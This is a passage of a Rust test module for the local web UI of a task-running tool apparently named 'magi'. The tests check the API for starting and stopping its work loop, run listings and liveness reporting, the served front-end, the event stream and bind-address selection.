6737 "the repository a start would use, named before it is started"
6738 );
6739 }
6740
6741 #[tokio::test]
6742 async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
6743 let f = Fixture::start().await;
6744
6745 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6746 assert_eq!(res.status, 200, "{}", res.body);
6747 let view = res.json();
6748 assert_eq!(view["running"], true);
6749 assert_eq!(
6750 view["owned"], true,
6751 "the loop the UI started is the UI's own to stop: {view}"
6752 );
6753 assert_eq!(
6754 view["merge"],
6755 Value::Null,
6756 "no override was given, so each repository's own config decides"
6757 );
6758
6759 let health = f.get("/api/health").await.json();
6763 assert_eq!(health["loop"]["running"], true, "{health}");
6764 assert_eq!(health["loop"]["owned"], true, "{health}");
6765
6766 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6767 }
6768
6769 #[tokio::test]
6770 async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
6771 let f = Fixture::start().await;
6772 let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6773 assert_eq!(first.status, 200, "{}", first.body);
6774
6775 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6776 assert_eq!(
6777 again.status, 409,
6778 "two loops on one queue race for the same claims: {}",
6779 again.body
6780 );
6781 assert!(
6782 again.json()["error"]
6783 .as_str()
6784 .is_some_and(|e| e.contains("already running the loop")),
6785 "the refusal has to say why: {}",
6786 again.body
6787 );
6788 assert_eq!(
6789 f.get("/api/loop").await.json()["running"],
6790 true,
6791 "and the loop that was already running is untouched by it"
6792 );
6793
6794 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6795 }
6796
6797 #[tokio::test]
6798 async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
6799 let f = Fixture::start().await;
6800 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6801
6802 let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6803 assert_eq!(
6804 res.status, 200,
6805 "the answer must not wait for the loop: a run in flight is tens of \
6806 minutes and the operator is holding a phone: {}",
6807 res.body
6808 );
6809
6810 let view = settled(&f, |v| v["running"] == false).await;
6811 assert_eq!(view["owned"], false);
6812 assert_eq!(
6813 view["stopping"], false,
6814 "a loop that has stopped is not still stopping: {view}"
6815 );
6816 assert_eq!(
6817 view["last_error"],
6818 Value::Null,
6819 "a loop that was asked to stop did not fail: {view}"
6820 );
6821
6822 let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6825 assert_eq!(twice.status, 200, "{}", twice.body);
6826 }
6827
6828 #[tokio::test]
6829 async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
6830 let f = Fixture::start().await;
6831 write_daemon(f.home.path(), Timestamp::now());
6834
6835 let view = f.get("/api/loop").await.json();
6836 assert_eq!(view["running"], false, "not in this process: {view}");
6837 assert_eq!(view["owned"], false, "and not this process's to control");
6838 assert_eq!(
6839 view["daemon"]["running"], true,
6840 "but a loop is alive somewhere, which is what the UI must say"
6841 );
6842 assert_eq!(view["daemon"]["pid"], 4242);
6843
6844 for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
6845 let res = f.post("/api/loop", Some(body)).await;
6846 assert_eq!(
6847 res.status, 409,
6848 "neither button may pretend to work on someone else's loop: {}",
6849 res.body
6850 );
6851 assert!(
6852 res.json()["error"]
6853 .as_str()
6854 .is_some_and(|e| e.contains("4242")),
6855 "the refusal has to name the process the operator must go to: {}",
6856 res.body
6857 );
6858 }
6859 assert_eq!(
6860 f.get("/api/loop").await.json()["running"],
6861 false,
6862 "and the refusal started nothing"
6863 );
6864 }
6865
6866 #[tokio::test]
6867 async fn a_stale_status_file_is_not_a_foreign_owner() {
6868 let f = Fixture::start().await;
6869 write_daemon(
6870 f.home.path(),
6871 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6872 );
6873
6874 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6875 assert_eq!(
6876 res.status, 200,
6877 "a daemon killed a minute ago must not lock the loop out of its \
6878 own home for good: {}",
6879 res.body
6880 );
6881 assert_eq!(res.json()["running"], true);
6882
6883 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6884 }
6885
6886 #[tokio::test]
6887 async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
6888 let f = Fixture::start().await;
6889 let before = f.get("/api/health").await.json()["loop_rev"]
6890 .as_u64()
6891 .expect("a loop revision");
6892
6893 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6894
6895 let after = f.get("/api/health").await.json()["loop_rev"]
6896 .as_u64()
6897 .expect("a loop revision");
6898 assert!(
6899 after > before,
6900 "the loop is in-process state, so this counter is the only thing \
6901 that tells a second device the first one started it: {before} -> \
6902 {after}"
6903 );
6904
6905 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6906 }
6907
6908 #[tokio::test]
6909 async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
6910 let f = Fixture::with_loop(launch_broken).await;
6911
6912 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6913 assert_eq!(
6914 res.status, 200,
6915 "starting it is not the failure: {}",
6916 res.body
6917 );
6918
6919 let view = settled(&f, |v| v["last_error"].is_string()).await;
6920 assert_eq!(
6921 view["running"], false,
6922 "a loop that died must not read as running, or the operator has \
6923 nothing to press: {view}"
6924 );
6925 assert_eq!(view["owned"], false);
6926 assert!(
6927 view["last_error"]
6928 .as_str()
6929 .is_some_and(|e| e.contains("read-only file system")),
6930 "the phone is where a loop that died at 3am is visible: {view}"
6931 );
6932
6933 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6936 assert_eq!(again.status, 200, "{}", again.body);
6937 assert_eq!(
6938 again.json()["last_error"],
6939 Value::Null,
6940 "a fresh start does not keep showing why the last one died"
6941 );
6942 }
6943
6944 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
6956 async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
6957 let home = TempDir::new().expect("temp home");
6958 let runs = home.path().join("runs");
6959 std::fs::create_dir_all(&runs).expect("runs dir");
6960 let ui = Ui::new(
6961 Queue::at(home.path().join("queue")),
6962 Questions::at(home.path().join("questions")),
6963 Talks::at(home.path().join("talks")),
6964 runs,
6965 home.path().to_path_buf(),
6966 PathBuf::from("/repo/magi"),
6967 )
6968 .with_worktrees_root(home.path().join("wt"))
6969 .with_launch(launch_knocking_on_the_way_out);
6970 let looping = ui.looping();
6971 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
6972 .await
6973 .expect("bind loopback");
6974 let addr = listener.local_addr().expect("local addr");
6975 *PARK_KNOCK.lock().expect("park knock") = Some(addr);
6976 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
6977
6978 let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
6979 assert_eq!(started.status, 200, "the loop starts: {}", started.body);
6980
6981 let bound = std::sync::Mutex::new(None);
6996 hand_over(home.path(), &looping, served, || {
6997 let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
6998 let attempt = loop {
6999 match std::net::TcpListener::bind(addr) {
7000 Ok(l) => {
7001 drop(l);
7002 break Ok(());
7003 }
7004 Err(e)
7005 if e.kind() == std::io::ErrorKind::AddrInUse
7006 && std::time::Instant::now() < deadline =>
7007 {
7008 std::thread::sleep(std::time::Duration::from_millis(10));
7009 }
7010 Err(e) => break Err(e.to_string()),
7011 }
7012 };
7013 *bound.lock().expect("bound") = Some(attempt);
7014 Ok(())
7015 })
7016 .await
7017 .expect("hand over");
7018
7019 assert_eq!(
7020 *PARK_HEARD.lock().expect("park heard"),
7021 Some(200),
7022 "the deck must answer while the loop is parking"
7023 );
7024 let attempt = bound
7025 .lock()
7026 .expect("bound")
7027 .take()
7028 .expect("the successor was started");
7029 assert!(
7030 attempt.is_ok(),
7031 "and the address must be free by the time it is: {attempt:?}"
7032 );
7033 }
7034
7035 #[tokio::test]
7036 async fn a_newer_daemon_status_file_still_renders() {
7037 let f = Fixture::start().await;
7038 std::fs::write(
7041 f.home.path().join("daemon.json"),
7042 serde_json::json!({
7043 "schema": 2,
7044 "updated_at": Timestamp::now().to_string(),
7045 "idle": true,
7046 "surprise": { "nested": [1, 2, 3] },
7047 })
7048 .to_string(),
7049 )
7050 .expect("write daemon.json");
7051
7052 let health = f.get("/api/health").await;
7053
7054 assert_eq!(health.status, 200);
7055 assert_eq!(health.json()["daemon"]["running"], true);
7056 }
7057
7058 #[tokio::test]
7059 async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
7060 let f = Fixture::start().await;
7061 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7062 let broken = f.runs().join("20260902-140502-bad");
7063 std::fs::create_dir_all(&broken).expect("run dir");
7064 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7065
7066 let list = f.get("/api/runs").await;
7067 let detail = f.get("/api/runs/20260902-140502-bad").await;
7068
7069 assert_eq!(list.status, 200);
7070 let listed = list.json();
7071 let ids: Vec<&str> = listed
7072 .as_array()
7073 .expect("an array")
7074 .iter()
7075 .map(|r| r["id"].as_str().expect("an id"))
7076 .collect();
7077 assert_eq!(
7078 ids,
7079 vec!["20260902-140501-good"],
7080 "one unreadable run must not cost the operator the whole history"
7081 );
7082 assert_eq!(detail.status, 500);
7083 assert!(
7084 detail.json()["error"]
7085 .as_str()
7086 .is_some_and(|e| e.contains("run.json")),
7087 "the failure names the file to look at: {}",
7088 detail.body
7089 );
7090 let health = f.get("/api/health").await;
7094 assert_eq!(health.json()["runs_unreadable"], 1);
7095 }
7096
7097 #[tokio::test]
7098 async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
7099 let f = Fixture::start().await;
7100 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
7101
7102 let summary = f.get("/api/runs").await.json();
7103 let row = &summary[0];
7104 assert_eq!(row["short"], "a1b2");
7105 assert_eq!(row["status"], "ready");
7106 assert_eq!(row["done"], true);
7107 assert_eq!(row["title"], "Add a web UI");
7108 assert_eq!(row["repo_name"], "magi");
7109 assert_eq!(row["judges"], 3);
7110 assert_eq!(row["winner"], Value::Null);
7111 assert_eq!(row["reviews"], 0);
7112
7113 let detail = f.get("/api/runs/a1b2").await;
7116 assert_eq!(detail.status, 200);
7117 assert_eq!(detail.json()["base_branch"], "main");
7118 assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
7119 }
7120
7121 #[tokio::test]
7129 async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
7130 let f = Fixture::start().await;
7131
7132 let mut none_run = RunState::new(
7133 PathBuf::from("/repo/magi"),
7134 "main".to_owned(),
7135 "0123456789abcdef".to_owned(),
7136 "Add a web UI".to_owned(),
7137 Config::default(),
7138 );
7139 none_run.id = "20260902-140503-none".to_owned();
7140 none_run.status = RunStatus::Ready;
7141 none_run.merge = Some(crate::run::MergeOutcome {
7142 mode: crate::config::MergeMode::None,
7143 ok: true,
7144 detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
7145 });
7146 write_state(&f.runs(), &none_run);
7147
7148 let mut pr_run = RunState::new(
7149 PathBuf::from("/repo/magi"),
7150 "main".to_owned(),
7151 "0123456789abcdef".to_owned(),
7152 "Add a web UI".to_owned(),
7153 Config::default(),
7154 );
7155 pr_run.id = "20260902-140504-prcl".to_owned();
7156 pr_run.status = RunStatus::Ready;
7157 pr_run.merge = Some(crate::run::MergeOutcome {
7158 mode: crate::config::MergeMode::Pr,
7159 ok: false,
7160 detail: "https://example.com/pr/1 was closed without merging".to_owned(),
7161 });
7162 write_state(&f.runs(), &pr_run);
7163
7164 let summary = f.get("/api/runs").await.json();
7165 let rows: std::collections::HashMap<&str, &Value> = summary
7166 .as_array()
7167 .expect("an array")
7168 .iter()
7169 .map(|r| (r["id"].as_str().expect("an id"), r))
7170 .collect();
7171 assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
7172 assert_eq!(
7173 rows[none_run.id.as_str()]["unmerged_by_design"],
7174 true,
7175 "a mode-none Ready must be flagged in the list"
7176 );
7177 assert_eq!(
7178 rows[pr_run.id.as_str()]["unmerged_by_design"],
7179 false,
7180 "a Ready reached by a closed pull request is a different case"
7181 );
7182
7183 let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
7184 assert_eq!(none_detail["status"], "ready");
7185 assert_eq!(none_detail["unmerged_by_design"], true);
7186
7187 let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
7188 assert_eq!(pr_detail["unmerged_by_design"], false);
7189 }
7190
7191 #[tokio::test]
7196 async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
7197 let f = Fixture::start().await;
7198 let id = "20260902-140502-bbbb";
7202 let mut state = RunState::new(
7203 PathBuf::from("/repo/magi"),
7204 "main".to_owned(),
7205 "0123456789abcdef".to_owned(),
7206 "Add a web UI".to_owned(),
7207 Config::default(),
7208 );
7209 state.id = id.to_owned();
7210 state.status = RunStatus::Judging;
7211 state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
7212 let dir = f.runs().join(id);
7213 std::fs::create_dir_all(&dir).expect("run dir");
7214 std::fs::write(
7215 dir.join("run.json"),
7216 serde_json::to_string_pretty(&state).expect("serialize run"),
7217 )
7218 .expect("write run.json");
7219
7220 let cold = f.get(&format!("/api/runs/{id}")).await.json();
7226 assert_eq!(cold["active"]["judge-2"]["node"], "judge");
7227 assert_eq!(cold["live"], "unknown", "{cold}");
7228
7229 write_daemon(f.home.path(), Timestamp::now());
7232 let warm = f.get(&format!("/api/runs/{id}")).await.json();
7233 assert_eq!(warm["live"], "live", "{warm}");
7234 }
7235
7236 #[tokio::test]
7243 async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
7244 let f = Fixture::start().await;
7245 let id = "20260922-090000-cccc";
7246 let mut state = RunState::new(
7247 PathBuf::from("/repo/magi"),
7248 "main".to_owned(),
7249 "0123456789abcdef".to_owned(),
7250 "Review only".to_owned(),
7251 Config::default(),
7252 );
7253 state.id = id.to_owned();
7254 state.status = RunStatus::Reviewing;
7255 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7256 state.driver_pid = Some(std::process::id());
7262 state.driver_started_at = Some(
7263 crate::proc::process_started_at(std::process::id())
7264 .expect("this test process's own start time must be queryable"),
7265 );
7266 let dir = f.runs().join(id);
7267 std::fs::create_dir_all(&dir).expect("run dir");
7268 std::fs::write(
7269 dir.join("run.json"),
7270 serde_json::to_string_pretty(&state).expect("serialize run"),
7271 )
7272 .expect("write run.json");
7273
7274 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7275 assert_eq!(detail["live"], "live", "{detail}");
7276 }
7277
7278 #[tokio::test]
7284 async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
7285 let f = Fixture::start().await;
7286 let id = "20260922-090100-dddd";
7287 let mut state = RunState::new(
7288 PathBuf::from("/repo/magi"),
7289 "main".to_owned(),
7290 "0123456789abcdef".to_owned(),
7291 "Review only".to_owned(),
7292 Config::default(),
7293 );
7294 state.id = id.to_owned();
7295 state.status = RunStatus::Reviewing;
7296 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7297 state.driver_pid = Some(std::process::id());
7302 state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
7303 let dir = f.runs().join(id);
7304 std::fs::create_dir_all(&dir).expect("run dir");
7305 std::fs::write(
7306 dir.join("run.json"),
7307 serde_json::to_string_pretty(&state).expect("serialize run"),
7308 )
7309 .expect("write run.json");
7310
7311 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7312 assert_eq!(detail["live"], "dead", "{detail}");
7313 }
7314
7315 #[test]
7319 fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
7320 let mk = |id: &str, pid: Option<u32>| {
7321 let mut s = RunState::new(
7322 PathBuf::from("/repo/magi"),
7323 "main".to_owned(),
7324 "0123456789abcdef".to_owned(),
7325 "Add a web UI".to_owned(),
7326 Config::default(),
7327 );
7328 s.id = id.to_owned();
7329 s.driver_pid = pid;
7330 s.driver_started_at = Some("t0".to_owned());
7331 s
7332 };
7333 let states = vec![
7334 mk("20260902-140502-aaaa", Some(77)),
7335 mk("20260902-140502-bbbb", Some(77)),
7336 mk("20260902-140502-cccc", Some(77)),
7337 mk("20260902-140502-dddd", None),
7338 ];
7339 let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
7340 let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
7341 let sup: HashMap<String, String> = [(
7342 "20260902-140502-aaaa".to_owned(),
7343 "20260902-140502-cccc".to_owned(),
7344 )]
7345 .into();
7346
7347 let status_calls = std::cell::Cell::new(0);
7348 let identity_calls = std::cell::Cell::new(0);
7349 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
7350 |_| {
7351 status_calls.set(status_calls.get() + 1);
7352 Some(true)
7353 },
7354 |_| {
7355 identity_calls.set(identity_calls.get() + 1);
7356 Some("t0".to_owned())
7357 },
7358 ));
7359 let rows = summarize(
7360 states,
7361 &open,
7362 &claimed,
7363 &sup,
7364 |p| probe.borrow_mut().status(p),
7365 |p| probe.borrow_mut().started_at(p),
7366 );
7367
7368 assert_eq!(status_calls.get(), 1, "one pid, one status query");
7369 assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
7370 assert_eq!(rows.len(), 4);
7371 assert!(!rows[0].waiting && rows[1].waiting);
7372 assert_eq!(rows[0].live, crate::run::Liveness::Live);
7373 assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
7374 assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
7375 assert_eq!(rows[1].superseded_by, None);
7376 }
7377
7378 #[test]
7379 fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
7380 let mut state = RunState::new(
7381 PathBuf::from("/repo/magi"),
7382 "main".to_owned(),
7383 "0123456789abcdef".to_owned(),
7384 "Review only".to_owned(),
7385 Config::default(),
7386 );
7387 state.id = "20260922-090200-dead".to_owned();
7388 state.status = RunStatus::Reviewing;
7389 let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
7390 .expect("serialize list row");
7391 assert_eq!(row["status"], "reviewing");
7392 assert_eq!(row["live"], "dead", "{row}");
7393 assert!(!row["done"].as_bool().unwrap());
7394 }
7395
7396 #[tokio::test]
7397 async fn the_run_list_is_newest_first_and_honours_a_limit() {
7398 let f = Fixture::start().await;
7399 for id in [
7400 "20260902-140501-aaaa",
7401 "20260902-140502-bbbb",
7402 "20260902-140503-cccc",
7403 ] {
7404 write_run(&f.runs(), id, RunStatus::Merged);
7405 }
7406
7407 let all = f.get("/api/runs").await.json();
7408 let capped = f.get("/api/runs?limit=2").await.json();
7409
7410 assert_eq!(all[0]["id"], "20260902-140503-cccc");
7411 assert_eq!(all.as_array().map(Vec::len), Some(3));
7412 assert_eq!(capped.as_array().map(Vec::len), Some(2));
7413 assert_eq!(capped[0]["id"], "20260902-140503-cccc");
7414 }
7415
7416 #[tokio::test]
7417 async fn the_report_route_serves_the_terminal_report_as_plain_text() {
7418 let f = Fixture::start().await;
7419 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
7420
7421 let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
7422
7423 assert_eq!(res.status, 200);
7424 assert!(
7425 res.headers
7426 .contains("content-type: text/plain; charset=utf-8"),
7427 "a browser must render it, not download it: {}",
7428 res.headers
7429 );
7430 assert!(
7434 res.body.contains("20260902-140501-a1b2"),
7435 "the report is about the run that was asked for: {}",
7436 res.body
7437 );
7438 }
7439
7440 #[tokio::test]
7441 async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
7442 let f = Fixture::start().await;
7443
7444 let html = f.get("/").await;
7445 let css = f.get("/app.css").await;
7446 let js = f.get("/app.js").await;
7447
7448 assert_eq!((html.status, css.status, js.status), (200, 200, 200));
7449 assert!(
7450 html.headers
7451 .contains("content-type: text/html; charset=utf-8")
7452 );
7453 assert!(css.headers.contains("content-type: text/css"));
7454 assert!(js.headers.contains("content-type: text/javascript"));
7455 assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
7456 }
7457
7458 #[test]
7459 fn review_rounds_label_a_distinct_verified_head() {
7460 assert!(APP_JS.contains("round.verified_head"));
7461 assert!(APP_JS.contains("verified HEAD"));
7462 assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
7463 }
7464
7465 #[test]
7466 fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
7467 assert!(APP_JS.contains("blocked: { glyph:"));
7471 assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
7472
7473 assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
7477 assert!(
7478 APP_JS.contains(
7479 "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
7480 ),
7481 "the note line must name what a blocked task is waiting on, not just that it is blocked"
7482 );
7483 assert!(APP_JS.contains("if (status === \"blocked\") {"));
7487
7488 assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
7492 assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
7493 assert!(
7494 APP_JS.contains("location.hash = \"#/questions\";"),
7495 "a question node must jump to the Questions screen, not pretend to be a task"
7496 );
7497
7498 assert!(APP_JS.contains("Resolved questions"));
7501 assert!(APP_JS.contains("r.answersList.append("));
7502 assert!(APP_CSS.contains(".task-answers"));
7503 }
7504
7505 #[test]
7506 fn a_task_notification_links_to_its_own_card_not_the_bare_backlog() {
7507 assert!(
7512 APP_JS.contains(
7513 "el(\"a\", { href: `#/queue/${encodeURIComponent(link.id)}`, text: `Task ${shortId(link.id)}` })"
7514 ),
7515 "a task notice's link must carry the task id into the hash, not just name the Backlog screen"
7516 );
7517 assert!(
7518 !APP_JS.contains("el(\"a\", { href: \"#/queue\", text: `Task ${shortId(link.id)}` })"),
7519 "regression: the task link must not go back to naming the bare Backlog route"
7520 );
7521
7522 assert!(
7525 APP_JS.contains(
7526 "if (parts[0] === \"queue\" && parts[1]) return { name: \"queue\", id: decodeURIComponent(parts[1]) };"
7527 ),
7528 "`#/queue/<id>` must parse into a route carrying that id"
7529 );
7530
7531 assert!(APP_JS.contains("state.queueFocus = route.id;"));
7535 assert!(APP_JS.contains("function consumeQueueFocus()"));
7536 assert!(APP_JS.contains("jumpToTask(id);"));
7537 }
7538
7539 #[test]
7540 fn consuming_a_queue_focus_survives_clearing_a_stale_backlog_search() {
7541 assert!(
7550 APP_JS.contains(
7551 " if (!id || state.queue === null) return;\n if (state.queueSearch.trim() !== \"\") {"
7552 ),
7553 "the search-clearing branch must run before state.queueFocus is cleared, or the \
7554 recursive renderQueue() call has nothing left to jump to"
7555 );
7556 assert!(
7557 APP_JS.contains("state.queueFocus = null;\n jumpToTask(id);"),
7558 "state.queueFocus must be cleared immediately before the jump it guards, not earlier"
7559 );
7560 }
7561
7562 #[test]
7563 fn a_notification_card_navigates_from_anywhere_on_it_not_just_its_link_text() {
7564 assert!(
7572 APP_JS.contains(
7573 "onclick: link ? (event) => { if (!event.target.closest(\"a, button\")) link.click(); } : null"
7574 ),
7575 "the notice card itself must forward a tap outside its link/buttons to the link's own click"
7576 );
7577 }
7578
7579 #[test]
7580 fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
7581 assert!(
7582 APP_JS.contains("round.verified_head !== round.head"),
7583 "a round that verified an earlier commit must be visibly distinct from one that \
7584 verified the head reviewers are looking at now"
7585 );
7586 assert!(
7587 APP_JS.contains("round.verified_at"),
7588 "when a check ran must be on the wire, not just which commit"
7589 );
7590 assert!(
7591 APP_JS.contains("resource_blocked"),
7592 "a command magi never got to run (shared build cache contention) must not render \
7593 the same as a command that ran and failed"
7594 );
7595 }
7596
7597 #[tokio::test]
7598 async fn the_change_stream_announces_the_current_revisions_on_connect() {
7599 let f = Fixture::start().await;
7600
7601 let mut socket = tokio::net::TcpStream::connect(f.addr)
7602 .await
7603 .expect("connect");
7604 socket
7605 .write_all(
7606 b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
7607 )
7608 .await
7609 .expect("write request");
7610
7611 let mut seen = String::new();
7614 let mut buf = [0u8; 1024];
7615 while !seen.contains("event: change") {
7616 let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
7617 .await
7618 .expect("the stream must speak within five seconds")
7619 .expect("read");
7620 assert!(read > 0, "the server closed the change stream: {seen}");
7621 seen.push_str(&String::from_utf8_lossy(&buf[..read]));
7622 }
7623
7624 assert!(
7625 seen.to_lowercase()
7626 .contains("content-type: text/event-stream"),
7627 "the browser only reconnects automatically for a real SSE stream: {seen}"
7628 );
7629 let data = seen
7630 .lines()
7631 .find_map(|l| l.strip_prefix("data:"))
7632 .expect("a data line");
7633 let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
7634 assert!(
7635 payload["queue_rev"].is_u64()
7636 && payload["runs_rev"].is_u64()
7637 && payload["questions_rev"].is_u64()
7638 && payload["talks_rev"].is_u64()
7639 && payload["notifications_rev"].is_u64()
7640 && payload["loop_rev"].is_u64(),
7641 "the client needs one revision per store to know what to refetch, \
7642 and `talks_rev` is the only notification a standing talk gets - a \
7643 phone whose radio slept through a turn learns about it here, as \
7644 does one whose operator started the loop from another device: \
7645 {payload}"
7646 );
7647
7648 let health = f.get("/api/health").await.json();
7655 for key in [
7656 "queue_rev",
7657 "runs_rev",
7658 "questions_rev",
7659 "talks_rev",
7660 "notifications_rev",
7661 "loop_rev",
7662 ] {
7663 assert!(
7664 health[key].is_u64(),
7665 "health is the change stream's fallback and is missing `{key}`: {health}"
7666 );
7667 }
7668 }
7669
7670 #[tokio::test]
7671 async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
7672 let f = Fixture::start().await;
7673 let before = f.get("/api/health").await.json()["talks_rev"]
7674 .as_u64()
7675 .expect("talks_rev");
7676
7677 let talk = seed_talk(&f, "20260904-014455-ab12", "open");
7678 std::thread::sleep(Duration::from_millis(10));
7679 let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
7680 on_disk.turns.push(crate::talk::Turn {
7681 who: crate::talk::Who::Operator,
7682 body: "a new turn".to_owned(),
7683 at: Timestamp::now(),
7684 attachments: Vec::new(),
7685 });
7686 f.talks().put(&mut on_disk).expect("record a turn");
7687
7688 let after = f.get("/api/health").await.json()["talks_rev"]
7689 .as_u64()
7690 .expect("talks_rev");
7691 assert_ne!(
7692 before, after,
7693 "a phone must be able to notice a talk's reply without polling every store"
7694 );
7695 }
7696
7697 #[test]
7698 fn bind_reads_back_from_the_spelling_the_cli_prints() {
7699 for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
7703 assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
7704 }
7705 assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
7706 assert!("everywhere".parse::<Bind>().is_err());
7707 }
7708
7709 #[test]
7710 fn an_explicit_bind_address_is_taken_verbatim() {
7711 let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
7712
7713 let (addr, warning) = resolve_bind(&Bind::Addr(asked));
7714
7715 assert_eq!(addr, asked);
7716 assert!(
7717 warning.is_none(),
7718 "an operator who named an address gets no lecture"
7719 );
7720 }
7721
7722 #[test]
7723 fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
7724 let (addr, warning) = resolve_bind(&Bind::Auto);
7725
7726 match addr {
7733 IpAddr::V4(ip) if is_tailnet(&ip) => {
7734 assert!(warning.is_none(), "a tailnet address needs no warning");
7735 }
7736 other => {
7737 assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
7738 let warning = warning.expect("a fallback has to explain itself");
7739 assert!(
7740 warning.contains("127.0.0.1") && warning.contains("local-only"),
7741 "the warning says what happened and what it costs: {warning}"
7742 );
7743 }
7744 }
7745 }
7746
7747 #[test]
7748 fn only_the_cgnat_block_counts_as_a_tailnet_address() {
7749 assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
7753 assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
7754 assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
7755 assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
7756 assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
7757 }
7758
7759 #[test]
7760 fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
7761 let ids = vec![
7762 "20260902-140501-aaaa".to_owned(),
7763 "20260902-140502-aabb".to_owned(),
7764 ];
7765
7766 let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
7767 let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
7768 let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
7769
7770 assert_eq!(missing.status, StatusCode::NOT_FOUND);
7771 assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
7772 assert_eq!(short, "20260902-140502-aabb");
7773 }
7774 #[tokio::test]
7775 async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
7776 let fx = Fixture::start().await;
7782 let id = panel(
7783 &fx,
7784 "<img src=\"shot.png\">",
7785 &[("shot.png", b"\x89PNG\r\n\x1a\n")],
7786 );
7787
7788 let doc = fx
7790 .get(&format!("/api/questions/{id}/panel/index.html"))
7791 .await;
7792 assert_eq!(doc.status, 200, "{}", doc.body);
